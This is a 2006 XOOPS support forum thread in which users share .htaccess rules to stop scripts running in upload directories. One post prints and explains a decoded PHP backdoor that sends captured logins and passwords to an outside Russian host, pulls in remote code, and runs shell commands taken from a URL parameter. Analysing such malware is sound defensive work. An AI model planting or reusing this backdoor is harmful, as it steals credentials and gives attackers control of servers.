11
OldFriend
Re: System Security.
  • 2006/8/26 12:38

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Quote:

The 3 directories along with their subdirectories are:
cache
templates_c
uploads

I would also suggest that you protect these directories by placing a .htaccess file in each of these directories with
Deny from all


Hmmmmm, it seems that this .htaccess works only for the cache and the templates_c directory.

I just noticed that in the uploads directory that it prevents any uploaded images from being displayed.

Does anyone know if there is another .htaccess method that will allow these images from being displayed but prevent any **.php files from being executed?

12
Dave_L
Re: System Security.
  • 2006/8/26 13:43

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


<Files *.php>
Deny from all
</Files>

13
iHackCode
Re: System Security.

Quote:

OldFriend wrote:
Quote:

The 3 directories along with their subdirectories are:
cache
templates_c
uploads

I would also suggest that you protect these directories by placing a .htaccess file in each of these directories with
Deny from all


Hmmmmm, it seems that this .htaccess works only for the cache and the templates_c directory.

I just noticed that in the uploads directory that it prevents any uploaded images from being displayed.

Does anyone know if there is another .htaccess method that will allow these images from being displayed but prevent any **.php files from being executed?


for my uploads directory i got something like
:
Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404
CBB / LatestNews / Publisher / XM-Spotlight

(ノ◕ヮ◕)ノ*:・゚✧

14
OldFriend
Re: System Security.
  • 2006/8/26 22:34

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Quote:

Dave_L wrote:
<Files *.php>
Deny from all
</Files>


Quote:

Bandit-X wrote:

Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404


More than one way to skin a cat. Thanks.

15
Dave_L
Re: System Security.
  • 2006/8/26 23:13

  • Dave_L

  • XOOPS is my life!

  • Posts: 2277

  • Since: 2003/11/7


Bandit-X's solution is better than mine, since it blocks other potentially dangerous file types.

16
ChrisG
Re: System Security.
  • 2006/8/28 12:47

  • ChrisG

  • Just popping in

  • Posts: 1

  • Since: 2006/8/28


Little inside on the script posted in one of the first topics... (decoded the base64) wich has the following as result..


error_reporting(0);

if(isset(
$_POST["l"]) and isset($_POST["p"])){
    if(isset(
$_POST["input"])){
        
$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));
    }else{
        
$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];
    }
}else{
    
$user_auth="";
}
if(!isset(
$_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(
"http://bis.iframe.ru/master.php?r_addr=" sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset(
$_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
$_POST["l"]=="special"){print "sys_active". `uname -a`;}
}


logic :

1. Disable all error reporting (^ALL)
2. See if the Post vars l or p where set?

Now it gets funy ;)

3. if the $_POST['input'] was touched (any value). then set the $user_auth as follow :

&l=(value from $_POST["l"]&p=(md5 hash of $_POST["P"])

where $_POST["p"] is usually the method used for database authentication. and the is actually a URI.

4. Else :

&l=(value from $_POST["l"]&p=(textbased $_POST["p"]). Prob because the password is allready in md5 format when input isnt set.

5. If no $_POST["l"] and $_POST["p"] isset $user_auth = "";

// Next the tricky part comes, This is also why he prop set the error reporting to (0).

First het checks if there is some $_POST['log_flg'] is set, if the case $log_flg gets the designated value.

Then he checks if the command "include_once("http://bis.iframe.ru/master.php?r_addr=010.025.251.010&url=(servername)(uri)($user_auth)($log_flg))

He inlcudes some script he owns. will try to fetch this include in a var and print it lol :P

next he executes both the system($_GET['']) < of wich i have no clue what it means. and he executes the 'uname -a' on the command prompt (wich is obvious a linux shell command, and prints it to the screen).

So the whole script was designed to fish user information (and more) from the server it was ran on. Im only very interested in what the "master.php" includes...

17
OldFriend
Re: System Security.
  • 2006/8/29 12:53

  • OldFriend

  • Just popping in

  • Posts: 99

  • Since: 2005/10/28


Very interesting. Thank you for that.

Now, my only question is this: Did he actually get "user information (and more) from the server it was ran on"?

18
svaha
Re: System Security.
  • 2006/9/7 20:51

  • svaha

  • Just can't stay away

  • Posts: 896

  • Since: 2003/8/2 2


Quote:

Bandit-X wrote:

for my uploads directory i got something like
:
Quote:
Order Deny,Allow
Deny from all
<FilesMatch "\.(gif|jpe?g|png)$">
Allow from all
</FilesMatch>

only the .gif .jpg .jpeg and .png image files are web accessible in that directory. the rest of the files in that directory get a 404


If I place this in a 'root' directory, are the subdirectories also 'protected', or must I place this htaccess file in every subdirectory also?
What doesn't kill me,
makes me stronger.

http://exm.amevita.eu
http://www.amevita.eu
http://www.alohaspirit.nl

19
iHackCode
Re: System Security.

its a bit strict but it should effect subdirectories too
CBB / LatestNews / Publisher / XM-Spotlight

(ノ◕ヮ◕)ノ*:・゚✧

20
nekro
Re: System Security.
  • 2006/9/8 3:54

  • nekro

  • Quite a regular

  • Posts: 213

  • Since: 2005/11/9


i should configure my apache to make the .httpacces files work no???

some can tell how to activate that???

Login

Who's Online

215 user(s) are online (119 user(s) are browsing Support Forums)


Members: 0


Guests: 215


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits